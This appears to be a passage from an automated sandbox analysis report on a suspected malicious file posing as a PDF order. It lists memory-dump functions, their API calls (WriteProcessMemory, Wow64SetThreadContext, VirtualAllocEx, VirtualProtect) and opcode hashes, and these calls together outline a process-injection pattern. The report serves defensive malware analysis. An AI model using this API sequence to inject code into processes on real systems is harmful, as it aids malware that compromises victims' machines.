                                                                                • Opcode ID: df8698fbfb359c0988424712edca428bb0914612120d627a617fe03e021aadfa
                                                                                • Instruction ID: e6e434c10c61f889d759aacad2e35beab6d986246bb5008a496c10dc6a0f53af
                                                                                • Opcode Fuzzy Hash: df8698fbfb359c0988424712edca428bb0914612120d627a617fe03e021aadfa
                                                                                • Instruction Fuzzy Hash: BD2146B5900349DFCB10CFA9C9817EEBBF5FF48310F14882AE959A7241C778A954CBA0

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 489c4f0-489c53e -> {489c54e-489c58d [WriteProcessMemory], 489c540-489c54c}; 489c540-489c54c -> 489c54e-489c58d; 489c54e-489c58d -> {489c58f-489c595, 489c596-489c5c6}; 489c58f-489c595 -> 489c596-489c5c6
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0489C580
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0d3b47ce60ffa496a55dd3475f2128d231e1dcef8c529b5f9ab00102f8c19c46
                                                                                • Instruction ID: 47081260c347d641576b79bb7ffded600006f82149ba75805121bcf6c4ae1a23
                                                                                • Opcode Fuzzy Hash: 0d3b47ce60ffa496a55dd3475f2128d231e1dcef8c529b5f9ab00102f8c19c46
                                                                                • Instruction Fuzzy Hash: 5F2139B19003099FCF10DFAAC885BEEBBF5FF48310F148429E919A7240C779A944CBA4

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 489bfd0-489c01b -> {489c02b-489c05b [Wow64SetThreadContext], 489c01d-489c029}; 489c01d-489c029 -> 489c02b-489c05b; 489c02b-489c05b -> {489c05d-489c063, 489c064-489c094}; 489c05d-489c063 -> 489c064-489c094
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0489C04E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 910f7bd17967295467c4c3b459660fedf92567efc768513e4fddab2534fccc1f
                                                                                • Instruction ID: 99fc29b0bbd1cb827f642477ed04d5ec51a5ad2db860df40c21f8bc6bf6bd252
                                                                                • Opcode Fuzzy Hash: 910f7bd17967295467c4c3b459660fedf92567efc768513e4fddab2534fccc1f
                                                                                • Instruction Fuzzy Hash: 132135B19003099FDB10DFAAC4857EEBBF4EF48324F14842AD519A7240CB79A945CFA1
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0489C04E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 5874235e64ffb37caf0fc727a0739f4f29b277db46becaa886c058c27cbb48c2
                                                                                • Instruction ID: a0ebf56ac7fdeaaece911de16c3712d601276d8f6b77c42f5c18d6052fbb2951
                                                                                • Opcode Fuzzy Hash: 5874235e64ffb37caf0fc727a0739f4f29b277db46becaa886c058c27cbb48c2
                                                                                • Instruction Fuzzy Hash: 452168B1D003099FDB10DFAAC5817EEBBF4AF48314F14842ED559A7240C778A985CFA1
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0489C954
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 088fbb669ed0eb05159e0293b25f14993f3aa44214e112105c1200c12e2a1411
                                                                                • Instruction ID: af9d86a12f64bc3ef55d779494b2909a4defe328e6e53fcf5474679306efd9ef
                                                                                • Opcode Fuzzy Hash: 088fbb669ed0eb05159e0293b25f14993f3aa44214e112105c1200c12e2a1411
                                                                                • Instruction Fuzzy Hash: 512104B1C002499FDB10DFAAC5416EEBBF5BF48320F14842AD469A7240DB7899458BA5
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0489C954
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 818ccc2ffd32ca6dc4c20fba9081f4eec429bc3bee81e72cf89757ce2346ba65
                                                                                • Instruction ID: 7d2633b5ed96ceeb8d8b4d0b803f8866bf4ae6d79908c0a5806cf5ed16373897
                                                                                • Opcode Fuzzy Hash: 818ccc2ffd32ca6dc4c20fba9081f4eec429bc3bee81e72cf89757ce2346ba65
                                                                                • Instruction Fuzzy Hash: 5C2113B18002099FDB10DFAAC544AEEFBF5FF48320F14842AD529A7240DB79A945CFA5
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0489C45E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 472c1d99259155b0a3f34bf261e9cece6b34e1ba7486e195fa5b8b5b4a660d9c
                                                                                • Instruction ID: ac2151c3612d0b09a79f78097a372d5b6c97e534fb98f4d878e607a7253b372c
                                                                                • Opcode Fuzzy Hash: 472c1d99259155b0a3f34bf261e9cece6b34e1ba7486e195fa5b8b5b4a660d9c
                                                                                • Instruction Fuzzy Hash: E31137719002499FCB10DFAAC844AEFFFF5EF48724F148819E519A7254C779A944CFA1
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0489C45E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 7ca42fca2e363c2086199a76b5877bcbd9a8142f205e75d40ed9e712a16f750c
                                                                                • Instruction ID: 098151c7e8c92d05f9fd4c52a4e31d4a00e3c205cf654cb15868518648160fba
                                                                                • Opcode Fuzzy Hash: 7ca42fca2e363c2086199a76b5877bcbd9a8142f205e75d40ed9e712a16f750c
                                                                                • Instruction Fuzzy Hash: AA1167B59002488FCF10DFAAC944BEEBFF5EF48314F148819E559A7254C739A944CFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: rq
                                                                                • API String ID: 0-1470361113
                                                                                • Opcode ID: b55593c583faf543a140e0992a7212ce75770d0e534371d035a2703973827f59
                                                                                • Instruction ID: f3583626415dcb64b1c1247f08be995b78f39a05ce73b4c87764e11f8770f5bd
                                                                                • Opcode Fuzzy Hash: b55593c583faf543a140e0992a7212ce75770d0e534371d035a2703973827f59
                                                                                • Instruction Fuzzy Hash: ED418970D002589FDB14DFA9D490AEEBFF5EF48304F24846AE409AB250DB389945CBA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Te]q
                                                                                • API String ID: 0-52440209
                                                                                • Opcode ID: daee889fb7197b7749e3d9522911f936a45d28d83251edbb8d2b7c2c86fe9117
                                                                                • Instruction ID: d4eb97453cd7991e6da98897be70e9796728356ffef08d5182e2eb4d91af7bfd
                                                                                • Opcode Fuzzy Hash: daee889fb7197b7749e3d9522911f936a45d28d83251edbb8d2b7c2c86fe9117
                                                                                • Instruction Fuzzy Hash: 64315979B40124CFCB08DFA8E999BADB7B1BF48715F100069E802DB3A1CB749C41DB44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -
                                                                                • API String ID: 0-2547889144
                                                                                • Opcode ID: 95ca38933597fe7a2321cfbf775b85e663d285106a4fc15cb7c236e936289759
                                                                                • Instruction ID: 6a7210ccd129862d6823b369dc1b66c1a1dc1a9272bf5e62b450f005ebc7fff3
                                                                                • Opcode Fuzzy Hash: 95ca38933597fe7a2321cfbf775b85e663d285106a4fc15cb7c236e936289759
                                                                                • Instruction Fuzzy Hash: 273101B0A02258CFDB64DF18C844BEDB7B1BB45308F0099EAC50AB7240DB71AE85CF01
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: &
                                                                                • API String ID: 0-1010288
                                                                                • Opcode ID: e2a0580af54bab59447d55dad38684935901a93bb1025508c6d760d6e204e473
                                                                                • Instruction ID: 8bd0dec4f3d5f798deb822157a176a05a44001c51f4e2d2cea91a24dffe5a074
                                                                                • Opcode Fuzzy Hash: e2a0580af54bab59447d55dad38684935901a93bb1025508c6d760d6e204e473
                                                                                • Instruction Fuzzy Hash: A721F974E01658CFDB64DF68C844BADBBB1BB49304F1085E9951EA7244E731AE81DF41
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: f0b51268500969c7f87403ceb78d4858f2ee9eae42d80c212c6895cab82ee9e3
                                                                                • Instruction ID: 81973fbc9572688375cc4f2294b5dc8709467a6ee5607599a9e5794e44a4b5d5
                                                                                • Opcode Fuzzy Hash: f0b51268500969c7f87403ceb78d4858f2ee9eae42d80c212c6895cab82ee9e3
                                                                                • Instruction Fuzzy Hash: 3211E0B4A01268CFCB64DF68C984BDDBBB1AB49318F1081D9D60DA7254D771AE81CF00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 7901586999c587ee2e131ef4b0706f125db515d92844356cf8ba9f0944f9804f
                                                                                • Instruction ID: 42034b1470fc6658914b9828e93197d327bcde4f8f4edc28734fa9f7cf0e3215
                                                                                • Opcode Fuzzy Hash: 7901586999c587ee2e131ef4b0706f125db515d92844356cf8ba9f0944f9804f
                                                                                • Instruction Fuzzy Hash: B21113B0910229CFCB64CF68DC98BA9B7B1EB49300F5082DAD40AA3240D7709E85CF01
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A
                                                                                • API String ID: 0-3554254475
                                                                                • Opcode ID: 9d888db76a3ac4c5267d044672e5c1d88b4dae4fe0235fd5849c676acde6a89a
                                                                                • Instruction ID: 62039f0078974ffc350d0cfbb44b2bc0fe32bff79ad55de80fe3e1581fc3702c
                                                                                • Opcode Fuzzy Hash: 9d888db76a3ac4c5267d044672e5c1d88b4dae4fe0235fd5849c676acde6a89a
                                                                                • Instruction Fuzzy Hash: 2B11C574D4112ECFDB64DF68C980BEDBBB1BB48308F1095E9D419A7254E6306E85AF00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: I
                                                                                • API String ID: 0-3707901625
                                                                                • Opcode ID: cd4edaf50a7a80bcca1ffdc6af9e2cac21cad65ea7d75f651dcf985efb8f358a
                                                                                • Instruction ID: b6610bef1f162dc69b3632d6e909f503b72ba0aed3fae6c1ffa013b4e9b0aa64
                                                                                • Opcode Fuzzy Hash: cd4edaf50a7a80bcca1ffdc6af9e2cac21cad65ea7d75f651dcf985efb8f358a
                                                                                • Instruction Fuzzy Hash: B7014CB4A10129CFDBA4DF14DC68BE9BBB1EB49305F5195E9941DA3280EBB41EC4DF02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: b2c511e0221b9d2e1b972a563bbf2918b4031d16d36e521c8ceab1f8dfe9671a
                                                                                • Instruction ID: 264c65294e9aba934a9c3e75e697ea4f115d211f937c48acc865cec0cd2b0621
                                                                                • Opcode Fuzzy Hash: b2c511e0221b9d2e1b972a563bbf2918b4031d16d36e521c8ceab1f8dfe9671a
                                                                                • Instruction Fuzzy Hash: 3A01BDB4A0222CDFDB29EF58D954BDCBBB1BF09308F104296D60AA3290D7706E81DF40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1
                                                                                • API String ID: 0-2212294583
                                                                                • Opcode ID: 2c1992ae584cbc9fa04ffd8e6a109ddb54bb50de9c7b42e2bf583b085910791c
                                                                                • Instruction ID: bd05def5fe226a60eba5ee5202546729fc32923a506b372fbfd1e3793d2cb495
                                                                                • Opcode Fuzzy Hash: 2c1992ae584cbc9fa04ffd8e6a109ddb54bb50de9c7b42e2bf583b085910791c
                                                                                • Instruction Fuzzy Hash: B1E09A75905559CFCB14DF14C944BD8BBB1AB44309F1484DA8409A7351D3759A86CF00
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa13714e4231495b3c6b268e9277b9d6593767cc4fbac65bb24a9279978dc6c2
                                                                                • Instruction ID: 7416ff46600e75a307a3139a4f7e49bc28642640776b9ac280319d7de14c425b
                                                                                • Opcode Fuzzy Hash: fa13714e4231495b3c6b268e9277b9d6593767cc4fbac65bb24a9279978dc6c2
                                                                                • Instruction Fuzzy Hash: C84214B5A04621CFD305EF0AE688A59BFB1FB41314F96C0D9D0164F26AE37AED85DB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b91243e4b35f3b7b334604ba592a15e67b0b9efd20ae5896857e508a9dce773
                                                                                • Instruction ID: be067b84c48cde021aadb2c40021ef07be29e17d82e7998868999608621d98c7
                                                                                • Opcode Fuzzy Hash: 0b91243e4b35f3b7b334604ba592a15e67b0b9efd20ae5896857e508a9dce773
                                                                                • Instruction Fuzzy Hash: 513225B1A04621CFE315EF1AE648A557FE1FB11314F96C0DAD0164F26AE37AE989DF00
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c717a2298617db7bfbfcac4f088bd97ca9eb0bb91ce0d60635fedfc68a19e439
                                                                                • Instruction ID: 3acd5a1c34eb757964f4a4d2b546e2fe52af31b508be3149eef1a66645f04488
                                                                                • Opcode Fuzzy Hash: c717a2298617db7bfbfcac4f088bd97ca9eb0bb91ce0d60635fedfc68a19e439
                                                                                • Instruction Fuzzy Hash: 870202B6A042559FCB10CF68D884BAEBBF1EF44300F21856AE446DB251D738EE85EB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 94b1516ee0b526e0c3aa62043b9bd2de28343c33b057973030c60d795a779c46
                                                                                • Instruction ID: 891a8b6a5a58ad01483ead2befafc9d78bbcfd0f2bc32d2da785410fc8f67813
                                                                                • Opcode Fuzzy Hash: 94b1516ee0b526e0c3aa62043b9bd2de28343c33b057973030c60d795a779c46
                                                                                • Instruction Fuzzy Hash: F4C10370A0121CCFDB94EF68D894BADBBB2FB89314F1085A9D10AA7355EB306D84DF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cf73d14cd08f67a72974cf4be8130806b32742f6126c586e31480f2b0ea430f6
                                                                                • Instruction ID: 7b1b55d9a4e55574621cc9f0cd8647abaceed2f66ac9099a72e87d30ccef3b7f
                                                                                • Opcode Fuzzy Hash: cf73d14cd08f67a72974cf4be8130806b32742f6126c586e31480f2b0ea430f6
                                                                                • Instruction Fuzzy Hash: E1C11570A01218CFDB94EF68D894BADBBB2FB89314F1085A9D10AB7355EB306D84DF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02d468b03d545b4a47d528567a5e0e2f2e08d5541e5f4fdd588cb4eab2fc834d
                                                                                • Instruction ID: 5b44d467d30679f826f30ad680543024d777c41ac1d67dac686a06a06206f25e
                                                                                • Opcode Fuzzy Hash: 02d468b03d545b4a47d528567a5e0e2f2e08d5541e5f4fdd588cb4eab2fc834d
                                                                                • Instruction Fuzzy Hash: F1C10370A01218CFDB94EF68D854BADBBF2FB89314F1085A9D50AA7355EB30AD84CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d0582b7f976657fcfa6a4dc76aad3d8cae687b2063e50d2c677874902d9ae05
                                                                                • Instruction ID: 3a9aadcdd090f6351b8833c68d3e48046f5cdaf9b8631ac7ae4bc8762e126bfe
                                                                                • Opcode Fuzzy Hash: 4d0582b7f976657fcfa6a4dc76aad3d8cae687b2063e50d2c677874902d9ae05
                                                                                • Instruction Fuzzy Hash: FFC10570A0121CCFDB94EF68D854BADBBB2FB89314F1085A9D10AA7355EB30AD84DF11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a67687ef41836b468170bc76223b20c0cf17eca56ef3662e20897573a6ea61f
                                                                                • Instruction ID: ae8785e1862e15cd41552152489d0b1a76885c46965ea8ea010b91b640512e82
                                                                                • Opcode Fuzzy Hash: 3a67687ef41836b468170bc76223b20c0cf17eca56ef3662e20897573a6ea61f
                                                                                • Instruction Fuzzy Hash: F6815232A042918FCB16DB78E8543AA7BB2FFA6310F1845EAC407CB295D734DC41E785
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ada2fdee3bee4b7a42afc51121cedfb9fea7b85931c7cd6f57831d1afc5e9de5
                                                                                • Instruction ID: ed45dc2bc55a4b0fc7c51735a06a9b7b49c32998cabcbd6beccab4af463a84d3
                                                                                • Opcode Fuzzy Hash: ada2fdee3bee4b7a42afc51121cedfb9fea7b85931c7cd6f57831d1afc5e9de5
                                                                                • Instruction Fuzzy Hash: C8315AB1D002589FDB14CFA9D490AEEBFF2AF48354F248069E419AB350DB789945DFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a002b906eb37dd930c613ec22483f6eb7833303792edcb425a18dd7d40e374b
                                                                                • Instruction ID: fce5f83c6475bf631f88ca48c370db89ddf0b764fa721c994df485760520ab71
                                                                                • Opcode Fuzzy Hash: 3a002b906eb37dd930c613ec22483f6eb7833303792edcb425a18dd7d40e374b
                                                                                • Instruction Fuzzy Hash: 457126B4A0521CCFCB45DFA8C844BADBBF2FB49304F1085A9E50AA7359D738A945DF11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa836ce36ef98f12493de39e292bffa0c23511d1fc27924975fb51434c15c51d
                                                                                • Instruction ID: 111602f8b8f36ff3c094847c2e732e4f9802366e1f249ccebe550e1a97b22c8f
                                                                                • Opcode Fuzzy Hash: fa836ce36ef98f12493de39e292bffa0c23511d1fc27924975fb51434c15c51d
                                                                                • Instruction Fuzzy Hash: F57113B4A01218CFDB45DFA8D844BADBBF2FB49304F1085A9E50AA7358DB38AD45DF11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2810def55fc34e1d561ba55c1b45732b83fd0d8c66eef650757ba88d54b62e88
                                                                                • Instruction ID: 1dadfbf1380dc3edb2a5a7cfe17f7cb714769fcb9a33e8b306240b2a9d2bda6b
                                                                                • Opcode Fuzzy Hash: 2810def55fc34e1d561ba55c1b45732b83fd0d8c66eef650757ba88d54b62e88
                                                                                • Instruction Fuzzy Hash: 156108B4A0521CDFCB45DFA8C848BADBBF2FB49304F108599E50AA7358DB38A945DF11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 015cd8c7e8a5a22a1335bd96c70645572b68d6ba19b9e90f3e96fa566949ef93
                                                                                • Instruction ID: 298f0ef5210594674910231dc64e78304d3b61c54b6999bf5e34b983204f3d60
                                                                                • Opcode Fuzzy Hash: 015cd8c7e8a5a22a1335bd96c70645572b68d6ba19b9e90f3e96fa566949ef93
                                                                                • Instruction Fuzzy Hash: 97513CB6A04619DFCB14CF69D444AAAB7F1FF48310F20892AE546DB320D338EA45DF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 79ef4d4331bfaee1bc8f380c4e0f0bccf47cdaa83bf1eeee1ce2418044387421
                                                                                • Instruction ID: ad7cae39f3bca31c9c4d5e1d8f64ebd496035d1453053b0ba6b105bad422b6ba
                                                                                • Opcode Fuzzy Hash: 79ef4d4331bfaee1bc8f380c4e0f0bccf47cdaa83bf1eeee1ce2418044387421
                                                                                • Instruction Fuzzy Hash: 565115B4A0521CDFCB45DFA9C844BADBBF2FB49304F108569E50AA7358E738A945DF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
